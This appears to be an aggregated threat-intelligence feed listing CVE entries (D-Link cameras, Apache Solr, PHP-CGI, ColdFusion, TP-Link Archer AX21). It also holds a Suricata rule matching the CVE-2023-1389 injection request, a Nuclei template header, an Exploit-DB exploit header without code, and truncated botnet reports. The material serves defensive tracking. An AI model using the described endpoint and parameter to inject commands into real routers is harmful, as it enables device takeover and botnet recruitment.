A Command Injection vulnerability exists in the /var/www/cgi-bin/rtpd.cgi script in D-Link IP Cameras DCS-3411/3430 firmware 1.02, DCS-5605/5635 1.01, DCS-1100L/1130L 1.04, DCS-1100/1130 1.03, DCS-1100/1130 1.04_US, DCS-2102/2121 1.05_RU, DCS-3410 1.02, DCS-5230 1.02, DCS-5230L 1.02, DCS-6410 1.00, DCS-7410 1.00, DCS-7510 1.00, and WCS-1100 1.02, which could let a remote malicious user execute arbitrary commands through the camera’s web interface.
Affected: D-Link dcs-3411_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit
VulnCheck
Apache Solr Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2013·CVSS 4.3
CVE-2013-6397 [MEDIUM] Apache Solr Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Apache Solr Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Directory traversal vulnerability in SolrResourceLoader in Apache Solr before 4.6 allows remote attackers to read arbitrary files via a .. (dot dot) or full pathname in the tr parameter to solr/select/, when the response writer (wt parameter) is set to XSLT. NOTE: this can be leveraged using a separate XXE (XML eXternal Entity) vulnerability to allow access to files across restricted network boundaries.
Affected: Apache Solr
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024;
VulnCheck
PHP-CGI Query String Parameter Vulnerability
vulncheck·2012·CVSS 9.8
CVE-2012-1823 [CRITICAL] CWE-20 PHP-CGI Query String Parameter Vulnerability
PHP-CGI Query String Parameter Vulnerability
sapi/cgi/cgi_main.c in PHP, when configured as a CGI script, does not properly handle query strings, which allows remote attackers to execute arbitrary code.
Affected: PHP PHP
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.fortiguard.com/encyclopedia/ips/31752; https://www.bleepingcomputer.com/news/security/linux-and-windows-servers-targeted-with-rubyminer-malware/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.trustwave.com/hubfs/Web/Library/Documents_pdf/2024_Trustwave_Public_Sector_Threat_Landscape.pdf; https://censys.com/cve-2024-4577/; https://www.trustwave.com/hubfs/Web/Library/Documents_pdf/2024_Trustwave_Professional_Services_Sector_Threa
VulnCheck
gecad axigen_free_mail_server Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2012·CVSS 6.4
CVE-2012-4940 [MEDIUM] gecad axigen_free_mail_server Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
gecad axigen_free_mail_server Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI.
Affected: gecad axigen_free_mail_server
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://w
VulnCheck
Adobe ColdFusion Directory Traversal Vulnerability
vulncheck·2010·CVSS 9.8
CVE-2010-2861 [CRITICAL] CWE-22 Adobe ColdFusion Directory Traversal Vulnerability
Adobe ColdFusion Directory Traversal Vulnerability
A directory traversal vulnerability exists in the administrator console in Adobe ColdFusion which allows remote attackers to read arbitrary files.
Affected: Adobe ColdFusion
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/; https://cybersecurityworks.com/howdymanage/uploads/file/csw_final_ransomware_index-update-q321-csw_.pdf; https://cybersecurityworks.com/howdymanage/uploads/file/ransomware-_-2022-spotlight-report_compressed.pdf; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.greynoise.io/blog/battling-ransomware-one-
VulnCheck
Adobe ColdFusion Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2009·CVSS 4.3
CVE-2009-1872 [MEDIUM] Adobe ColdFusion Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Adobe ColdFusion Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
Affected: Adobe ColdFusion
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f
VulnCheck
Adobe BlazeDS Information Disclosure Vulnerability
vulncheck·2009·CVSS 6.5
CVE-2009-3960 [MEDIUM] Adobe BlazeDS Information Disclosure Vulnerability
Adobe BlazeDS Information Disclosure Vulnerability
Adobe BlazeDS, which is utilized in LifeCycle and Coldfusion, contains a vulnerability that allows for information disclosure.
Affected: Adobe BlazeDS
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/; https://cybersecurityworks.com/howdymanage/uploads/file/csw_final_ransomware_index-update-q321-csw_.pdf; https://cybersecurityworks.com/howdymanage/uploads/file/ransomware-_-2022-spotlight-report_compressed.pdf; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://cybersecurityworks.com/howdymanage/uploads/file/RansomwareUpdate%20Re
VulnCheck
dirk_bartley nweb2fax Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2008·CVSS 5.0
CVE-2008-6668 [MEDIUM] dirk_bartley nweb2fax Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
dirk_bartley nweb2fax Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) id parameter to comm.php and (2) var_filename parameter to viewrq.php.
Affected: dirk_bartley nweb2fax
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-20
VulnCheck
Alcatel OmniPCX Enterprise Remote Code Execution Vulnerability
vulncheck·2007·CVSS 9.8
CVE-2007-3010 [CRITICAL] CWE-20 Alcatel OmniPCX Enterprise Remote Code Execution Vulnerability
Alcatel OmniPCX Enterprise Remote Code Execution Vulnerability
masterCGI in the Unified Maintenance Tool in Alcatel OmniPCX Enterprise Communication Server allows remote attackers to execute arbitrary commands.
Affected: Alcatel OmniPCX Enterprise
Required Action: Apply updates per vendor instructions.
Exploitation References: https://blog.radware.com/security/botnets/2020/05/whos-viktor-tracking-down-the-xtc-polaris-botnets/; https://www.researchgate.net/publication/348602660_An_analysis_of_the_use_of_CVEs_by_IoT_malware; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://cujo.com/blog/the-2022-2023-iot-botnet-report-vulnerabilities-targeted/; https://cujo.com/the-2022-2023-iot-botnet-report-vulnerabilities-targeted/; https://www.trustwave.com
CISA
TP-Link Archer AX-21 Command Injection Vulnerability
cisa·2023-05-01·CVSS 8.8
CVE-2023-1389 [HIGH] CWE-77 TP-Link Archer AX-21 Command Injection Vulnerability
Vulnerability: TP-Link Archer AX-21 Command Injection Vulnerability
Affected: TP-Link Archer AX21
TP-Link Archer AX-21 contains a command injection vulnerability that allows for remote code execution.
Required Action: Apply updates per vendor instructions.
Notes: https://www.tp-link.com/us/support/download/archer-ax21/v3/#Firmware; https://nvd.nist.gov/vuln/detail/CVE-2023-1389
Remediation Due Date: 2023-05-22
Suricata
ET EXPLOIT TP-Link Archer AX21 Unauthenticated Command Injection Inbound (CVE-2023-1389)
suricata·2023-03-14·CVSS 8.8
CVE-2023-1389 [HIGH] ET EXPLOIT TP-Link Archer AX21 Unauthenticated Command Injection Inbound (CVE-2023-1389)
ET EXPLOIT TP-Link Archer AX21 Unauthenticated Command Injection Inbound (CVE-2023-1389)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT TP-Link Archer AX21 Unauthenticated Command Injection Inbound (CVE-2023-1389)"; http.method; content:"POST"; http.uri; content:"/cgi-bin"; startswith; content:"|3b|stok=/locale?form=country"; fast_pattern; http.request_body; content:"operation=write"; content:"country=|24 28|"; reference:cve,2023-1389; reference:url,tenable.com/security/research/tra-2023-11; classtype:attempted-admin; sid:2044585; rev:1; metadata:attack_target Networking_Equipment, created_at 2023_03_14, cve CVE_2023_1389, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag CISA_KEV, updated_at 2023_03_14, mitre_tactic_id T
Exploit-DB
TP-Link Archer AX21 - Unauthenticated Command Injection
exploitdb·2023-08-10·CVSS 8.8
CVE-2023-1389 [HIGH] TP-Link Archer AX21 - Unauthenticated Command Injection
TP-Link Archer AX21 - Unauthenticated Command Injection
---
#!/usr/bin/python3
#
# Exploit Title: TP-Link Archer AX21 - Unauthenticated Command Injection
# Date: 07/25/2023
# Exploit Author: Voyag3r (https://github.com/Voyag3r-Security)
# Vendor Homepage: https://www.tp-link.com/us/
# Version: TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 (https://www.tenable.com/cve/CVE-2023-1389)
# Tested On: Firmware Version 2.1.5 Build 20211231 rel.73898(5553); Hardware Version Archer AX21 v2.0
# CVE: CVE-2023-1389
#
# Disclaimer: This script is intended to be used for educational purposes only.
# Do not run this against any system that you do not have permission to test.
# The author will not be held responsible for any use or damage caused by this
# program.
#
# CVE-202
Nuclei
TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection
nuclei·CVSS 8.8
CVE-2023-1389 [HIGH] TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection
TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection
TP-Link Archer AX21 (AX1800) routers are vulnerable to unauthenticated OS command injection via the country parameter in the locale endpoint. This allows remote attackers to execute arbitrary commands as root.
Template:
id: CVE-2023-1389
info:
  name: TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection
  author: ritikchaddha
  severity: critical
  description: |
    TP-Link Archer AX21 (AX1800) routers are vulnerable to unauthenticated OS command injection via the country parameter in the locale endpoint. This allows remote attackers to execute arbitrary commands as root.
  impact: |
    Unauthenticated attackers can exploit OS command injection through the country parameter in the locale endpoint to execute arbitrary commands
Checkpoint
4th May – Threat Intelligence Report
blogs_checkpoint·2026-05-04·CVSS 9.9
CVE-2026-26268 [CRITICAL] 4th May – Threat Intelligence Report
## 4th May – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 4th May, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
Medtronic, a global medical device maker, has disclosed a cyberattack on its corporate IT systems. An unauthorized party accessed data, while the company reported no impact on products, operations, or financial systems. Threat group ShinyHunters claimed the theft of 9 million records, and Medtronic is evaluating what data was expose
Krebs
Anti-DDoS Firm Heaped Attacks on Brazilian ISPs
blogs_krebs·2026-04-30
CVE-2023-1389 Anti-DDoS Firm Heaped Attacks on Brazilian ISPs
A Brazilian tech firm that specializes in protecting networks from distributed denial-of-service (DDoS) attacks has been enabling a botnet responsible for an extended campaign of massive DDoS attacks against other network operators in Brazil, KrebsOnSecurity has learned. The firm’s chief executive says the malicious activity resulted from a security breach and was likely the work of a competitor trying to tarnish his company’s public image.
An Archer AX21 router from TP-Link. Image: tp-link.com.
For the past several years, security experts have tracked a series of massive DDoS attacks originating from Brazil and solely targeting Brazilian ISPs. Until recently, it was less than clear who or what was behind these digital sieges. That changed earlier this month when a trusted source who ask
Bleepingcomputer
New Mirai campaign exploits RCE flaw in EoL D-Link routers
blogs_bleepingcomputer·2026-04-22·CVSS 8.8
CVE-2025-29635 [HIGH] New Mirai campaign exploits RCE flaw in EoL D-Link routers
## New Mirai campaign exploits RCE flaw in EoL D-Link routers
## Bill Toulas
"The Akamai SIRT discovered active exploitation attempts of the D-Link command injection vulnerability CVE-2025-29635 in our global network of honeypots in early March 2026," reads Akamai's report.
"This vulnerability exists in D-Link DIR-823X series routers in firmware versions 240126 and 24082, and allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to the /goform/set_prohibiting endpoint via the corresponding function, which can trigger remote command execution."
The researchers who discovered the flaw briefly published a proof-of-concept (PoC) exploit on GitHub, but later retracted it.
Akamai's observations show attackers are sending POST requests that
Greynoiseio
Threat Actors Actively Targeting LLMs
blogs_greynoiseio·2026-01-08
Threat Actors Actively Targeting LLMs
Checkpoint
13th October – Threat Intelligence Report
blogs_checkpoint·2025-10-13
CVE-2023-1389 13th October – Threat Intelligence Report
## 13th October – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 13th October, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
Qilin ransomware group has claimed responsibility for targeting Asahi, Japan’s largest brewing company, which was hacked on September 29th. The attack resulted in the exfiltration of over 9,300 files totaling 27GB of sensitive data, including financial documents, employee IDs, contracts, and internal reports. The at
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus, Oct 09, 2025
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Own Toronto 2022.
Januar
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
# RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus
2025/10/09
Key takeaways
- The campaign exposes organizations to the risks of data exfiltration, persistent network compromise, and operational disruption for organizations with exposed infrastructure.
- Organizations operating internet-facing network devices are at heightened risk. Active exploitation has been observed globally since mid-2025, with several CVEs now included in CISA’s Known Exploited Vul
Bleepingcomputer
RondoDox botnet targets 56 n-day flaws in worldwide attacks
blogs_bleepingcomputer·2025-10-09·CVSS 8.8
[HIGH] RondoDox botnet targets 56 n-day flaws in worldwide attacks
## RondoDox botnet targets 56 n-day flaws in worldwide attacks
## Bill Toulas
A new large-scale botnet called RondoDox is targeting 56 vulnerabilities in more than 30 distinct devices, including flaws first disclosed during Pwn2Own hacking competitions.
The attacker focuses on a wide range of exposed devices, including DVRs, NVRs, CCTV systems, and web servers, and has been active since June.
The RondoDox botnet leverages what Trend Micro researchers call an “exploit shotgun” strategy, where numerous exploits are used simultaneously to maximize infections, even if the activity is very noisy.
Since FortiGuard Labs discovered RondoDox, the botnet appears to have expanded the list of exploited vulnerabilities, which included CVE-2024-3721 and CVE-2024-12856.
## Mass n-day exploitat
Fortinet
The Resurgence of IoT Malware: Inside the Mirai-Based Botnet Campaign | FortiGuard Labs
blogs_fortinet·2025-08-22
The Resurgence of IoT Malware: Inside the Mirai-Based Botnet Campaign | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
The Resurgence of IoT Malware: Inside the Mirai-Based Botnet Campaign
Unpacking the Mirai-based Gayfemboy botnet campaign, its evolution, global targets, and Fortinet security protections
FORTIGUARD SECURITY PORTFOLIO 2025 THREAT LANDSCAPE REPORT
Incidents
Malware Analysis
Conclusion
Fortinet Protections
IOCs
By Vincent Li | August 22, 2025
Affected Platforms: DrayTek Vigor2960 1.3.1_Beta, DrayTek Vigor3900 1.4.4_Beta, DrayTek Vigor300B 1.3.3_Beta, DrayTek Vigor300B 1.4.2.1_Beta, DrayTek Vigor300B 1.4.4_Beta, TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219, Raisecom MSG1200, Raisecom MSG2100E, Raisecom MSG2200, Raisecom MSG2300 3.90, Cisco ISE, Cisco ISE-PIC
Impacted Users: Any organization
Impact: Remote attackers gain control
Fortinet
RondoDox Unveiled: Breaking Down a New Botnet Threat | FortiGuard Labs
blogs_fortinet·2025-07-03·CVSS 7.2
[HIGH] RondoDox Unveiled: Breaking Down a New Botnet Threat | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
RondoDox Unveiled: Breaking Down a New Botnet Threat
A new botnet built for evasion and disruption
Vulnerability Details
Downloader Analysis
RondoDox Analysis
Conclusion
Fortinet Protections
IOCs
By Vincent Li | July 03, 2025
Affected Platforms: TBK DVR-4104. TBK DVR-4216. Four-Faith router models F3x24. Four-Faith router models F3x36.
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High
Over the past month, FortiGuard Labs has observed a significant increase in scanning activity, including a new botnet campaign that exploits two high-risk vulnerabilities: CVE-2024-3721 and CVE-2024-12856. Both have been publicly disclosed and are actively being targeted, posing serious risks to device se
Bleepingcomputer
Hackers target SSRF bugs in EC2-hosted sites to steal AWS credentials
blogs_bleepingcomputer·2025-04-09
Hackers target SSRF bugs in EC2-hosted sites to steal AWS credentials
## Hackers target SSRF bugs in EC2-hosted sites to steal AWS credentials
## Bill Toulas
A targeted campaign exploited Server-Side Request Forgery (SSRF) vulnerabilities in websites hosted on AWS EC2 instances to extract EC2 Metadata, which could include Identity and Access Management (IAM) credentials from the IMDSv1 endpoint.
Retrieving IAM credentials allows attackers to escalate their privileges and access S3 buckets or control other AWS services, potentially leading to sensitive data exposure, manipulation, and service disruption.
The campaign was discovered by F5 Labs researchers, who report that the malicious activity peaked between March 13 and 25, 2025. The traffic and behavioral patterns strongly suggest that it was carried out by a single threat actor.
## Campaign over
Schneier
TP-Link Router Botnet
blogs_schneier·2025-03-14·CVSS 8.8
CVE-2023-1389 [HIGH] TP-Link Router Botnet
## TP-Link Router Botnet
There is a new botnet that is infecting TP-Link routers:
The botnet can lead to command injection which then makes remote code execution (RCE) possible so that the malware can spread itself across the internet automatically. This high severity security flaw (tracked as CVE-2023-1389) has also been used to spread other malware families as far back as April 2023 when it was used in the Mirai botnet malware attacks. The flaw is also linked to the Condi and AndroxGh0st malware attacks.
[…]
Of the thousands of infected devices, the majority of them are concentrated in Brazil, Poland, the United Kingdom, Bulgaria and Turkey; with the botnet targeting manufacturing, medical/healthcare, services and technology organizations in the United States, Australia, China and Mexi
Bleepingcomputer
New botnet exploits vulnerabilities in NVRs, TP-Link routers
blogs_bleepingcomputer·2024-12-24·CVSS 9.8
[CRITICAL] New botnet exploits vulnerabilities in NVRs, TP-Link routers
## New botnet exploits vulnerabilities in NVRs, TP-Link routers
## Bill Toulas
A new Mirai-based botnet is actively exploiting a remote code execution vulnerability that has not received a tracker number and appears to be unpatched in DigiEver DS-2105 Pro NVRs.
The campaign started in October and targets multiple network video recorders and TP-Link routers with outdated firmware.
One of the vulnerabilities used in the campaign was documented by TXOne researcher Ta-Lun Yen and presented last year at the DefCamp security conference in Bucharest, Romania. The researcher said at the time that the issue affects multiple DVR devices.
Akamai researchers observed that the botnet started to exploit the flaw in mid-November, but found evidence that the campaign has been active since at least Sep
Fortinet
MerkSpy: Exploiting CVE-2021-40444 to Infiltrate Systems | FortiGuard Labs
blogs_fortinet·2024-06-27·CVSS 8.8
CVE-2021-40444 [HIGH] MerkSpy: Exploiting CVE-2021-40444 to Infiltrate Systems | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
MerkSpy: Exploiting CVE-2021-40444 to Infiltrate Systems
CVE-2021-40444 Exploitation
ShellCode Preparation
ShellCode
MerkSpy
Conclusion
Fortinet Protections
IOCs
IP Addresses
Files
By Cara Lin | June 27, 2024
Affected Platforms: Microsoft Windows
Impacted Users: Microsoft Windows
Impact: The stolen information can be used for future attack
Severity Level: High
Spyware is malicious software engineered to covertly monitor and gather information from a user’s computer without their awareness or consent. It can record activities like keystrokes, browsing behavior, and personal information, often transmitting this data to a third party for espionage or theft.
FortiGuard Labs recently detected an attack exploiting the CVE-2021-40444 vulnerability in Microsoft
Fortinet
The Growing Threat of Malware Concealed Behind Cloud Services | FortiGuard Labs
blogs_fortinet·2024-06-25·CVSS 9.8
[CRITICAL] The Growing Threat of Malware Concealed Behind Cloud Services | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
The Growing Threat of Malware Concealed Behind Cloud Services
UNSTABLE Botnet
Condi DDoS Botnet
UDP Flooder and Process Checker
Skibidi
Conclusion
Fortinet Protections
IOCs
C2
URLs
Files
By Cara Lin and Vincent Li | June 25, 2024
Affected Platforms: Linux Distributions
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High
Cybersecurity threats are increasingly leveraging cloud services to store, distribute, and establish command and control (C2) servers, such as VCRUMS stored on AWS or SYK Crypter distributed via DriveHQ. This shift in strategy presents significant challenges for detection and prevention, as cloud services provide scalability, anonymity, and resilience that traditional hostin
Bleepingcomputer
Multiple botnets exploiting one-year-old TP-Link flaw to hack routers
blogs_bleepingcomputer·2024-04-17·CVSS 8.8
CVE-2023-1389 [HIGH] Multiple botnets exploiting one-year-old TP-Link flaw to hack routers
## Multiple botnets exploiting one-year-old TP-Link flaw to hack routers
## Bill Toulas
At least six distinct botnet malware operations are hunting for TP-Link Archer AX21 (AX1800) routers vulnerable to a command injection security issue reported and addressed last year.
Tracked as CVE-2023-1389, the flaw is a high-severity unauthenticated command injection problem in the locale API reachable through the TP-Link Archer AX21 web management interface.
Several researchers discovered it in January 2023 and reported it to the vendor through the Zero-Day Initiative (ZDI). TP-Link addressed the problem with the release of firmware security updates in March 2023. Proof-of-concept exploit code emerged shortly after the security advisories became public.
Following that, cybersecurity teams warned
Fortinet
Botnets Continue Exploiting CVE-2023-1389 for Wide-Scale Spread | FortiGuard Labs
blogs_fortinet·2024-04-16·CVSS 8.8
CVE-2023-1389 [HIGH] Botnets Continue Exploiting CVE-2023-1389 for Wide-Scale Spread | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Botnets Continue Exploiting CVE-2023-1389 for Wide-Scale Spread
Infection - CVE-2023-1389
AGoent
Gafgyt Variant
Moobot
Mirai Variant
Miori
Condi
Conclusion
Fortinet Protections
IOCs
C2
URLs
Files
By Cara Lin and Vincent Li | April 16, 2024
Affected Platforms: TP-Link Archer AX21 (AX1800) Version 1.1.4 Build 20230219 or prior
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High
Last year, a command injection vulnerability, CVE-2023-1389, was disclosed and a fix developed for the web management interface of the TP-Link Archer AX21 (AX1800). FortiGuard Labs has developed an IPS signature to tackle this issue. Recently, we observed multiple attacks focusing on this year-old vulnerability, spotl
Fortinet
GoTitan Botnet - Ongoing Exploitation on Apache ActiveMQ | FortiGuard Labs
blogs_fortinet·2023-11-28·CVSS 10.0
[CRITICAL] GoTitan Botnet - Ongoing Exploitation on Apache ActiveMQ | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
GoTitan Botnet - Ongoing Exploitation on Apache ActiveMQ
Exploitation
GoTitan
Sliver
PrCtrl Rat
Kinsing
Ddostf
Conclusion
Fortinet Protections
IOCs
IP List
Files
By Cara Lin | November 28, 2023
Affected Platforms: Any OS running Apache Active MQ versions prior to 5.15.16, 5.16.7, 5.17.6, and 5.18.3
Impacted Parties: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
This past October, Apache issued a critical advisory addressing CVE-2023-46604, a vulnerability involving the deserialization of untrusted data in Apache. On November 2, the Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2023-46604 to its known exploited list, KEV Catalog, indicating this vulnerability's high risk and im
Bleepingcomputer
Mirai DDoS malware variant expands targets with 13 router exploits
blogs_bleepingcomputer·2023-10-10·CVSS 9.8
[CRITICAL] Mirai DDoS malware variant expands targets with 13 router exploits
## Mirai DDoS malware variant expands targets with 13 router exploits
## Bill Toulas
A Mirai-based DDoS (distributed denial of service) malware botnet tracked as IZ1H9 has added thirteen new payloads to target Linux-based routers and routers from D-Link, Zyxel, TP-Link, TOTOLINK, and others.
Fortinet researchers report observing a peak in the exploitation rates around the first week of September, reaching tens of thousands of exploitation attempts against vulnerable devices.
IZ1H9 compromises devices to enlist them to its DDoS swarm and then launches DDoS attacks on specified targets, presumably on the order of clients renting its firepower.
## Extensive IoT targeting
The more devices and vulnerabilities a DDoS malware targets, the greater the potential to build a large and powerful
Fortinet
IZ1H9 Campaign Enhances Its Arsenal with Scores of Exploits | FortiGuard Labs
blogs_fortinet·2023-10-09·CVSS 9.8
[CRITICAL] IZ1H9 Campaign Enhances Its Arsenal with Scores of Exploits | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
IZ1H9 Campaign Enhances Its Arsenal with Scores of Exploits
By Cara Lin | October 09, 2023
Affected Platforms: Linux
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
In September 2023, our FortiGuard Labs team observed that the IZ1H9 Mirai-based DDoS campaign has aggressively updated its arsenal of exploits. Thirteen payloads were included in this variant, including ones targeting D-Link devices, Netis wireless routers, Sunhillo SureLine, Geutebruck IP cameras, Yealink Device Management, Zyxel devices, TP-Link Archer, Korenix Jetwave, and TOTOLINK routers.
Based on the trigger counts recorded by our IPS signatures, it is evident that peak exploitation occurred on September 6, with trigger counts ran
Fortinet
DDoS Botnets Target Zyxel Vulnerability CVE-2023-28771 | FortiGuard Labs
blogs_fortinet·2023-07-19·CVSS 9.8
CVE-2023-28771 [CRITICAL] DDoS Botnets Target Zyxel Vulnerability CVE-2023-28771 | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
DDoS Botnets Target Zyxel Vulnerability CVE-2023-28771
By Cara Lin | July 19, 2023
Affected platforms: Linux
Impacted parties: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity level: Critical
In June 2023, FortiGuard Labs detected the propagation of several DDoS botnets exploiting the Zyxel vulnerability (CVE-2023-28771). This vulnerability is characterized by a command injection flaw affecting multiple firewall models that could potentially allow an unauthorized attacker to execute arbitrary code by sending a specifically crafted packet to the targeted device. The severity of this flaw, rated 9.8 on the CVSS scoring system, was reported by researchers from TRAPA Security. Zyxel released a security advisory regard
Unit42
IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
blogs_unit42·2023-06-22·CVSS 9.8
CVE-2019-12725 [CRITICAL] IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
## Executive Summary
Since March 2023, Unit 42 researchers have observed threat actors leveraging several IoT vulnerabilities to spread a variant of the Mirai botnet. The vulnerabilities exploited include those listed in the following table:
| CVE/Product | Description |
|---|---|
| CVE-2019-12725 | Zeroshell Remote Command Execution Vulnerability |
| CVE-2019-17621 | D-Link DIR-859 Remote Command Injection Vulnerability |
| CVE-2019-20500 | D-Link DWL-2600AP Remote Command Execution Vulnerability |
| CVE-2021-25296 | Nagios XI Remote Command Injection Vulnerability |
| CVE-2021-46422 | Telesquare SDT-CW3B1 Router Command Injection Vulnerability |
| CVE-2022-27002 | Arris TR3300 Remote Command Injection Vulnerability |
| CVE-2022-29303 | SolarView Compact Command Injection Vulnerability |
| CVE-2022-30023 | Tenda HG9 Router Command Injectio |
Unit42
IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
blogs_unit42·2023-06-22·CVSS 9.8
CVE-2019-12725 [CRITICAL] IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
## IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
Chao Lei
Zhibin Zhang
Yiheng An
Cecilia Hu
Published: June 22, 2023
Fortinet
Condi DDoS Botnet Spreads via TP-Link's CVE-2023-1389 | FortiGuard Labs
blogs_fortinet·2023-06-20·CVSS 8.8
CVE-2023-1389 [HIGH] Condi DDoS Botnet Spreads via TP-Link's CVE-2023-1389 | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Condi DDoS Botnet Spreads via TP-Link's CVE-2023-1389
By Joie Salvio and Roy Tay | June 20, 2023
Affected platforms: Linux
Impacted parties: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity level: Critical
FortiGuard Labs encountered recent samples of a DDoS-as-a-service botnet calling itself Condi. It attempted to spread by exploiting TP-Link Archer AX21 (AX1800) routers vulnerable to CVE-2023-1389, which was disclosed in mid-March of this year. We have additionally observed an increasing number of Condi samples collected from our monitoring systems since the end of May 2023, indicating an active attempt to expand the botnet.
This blog details the capabilities of this botnet.
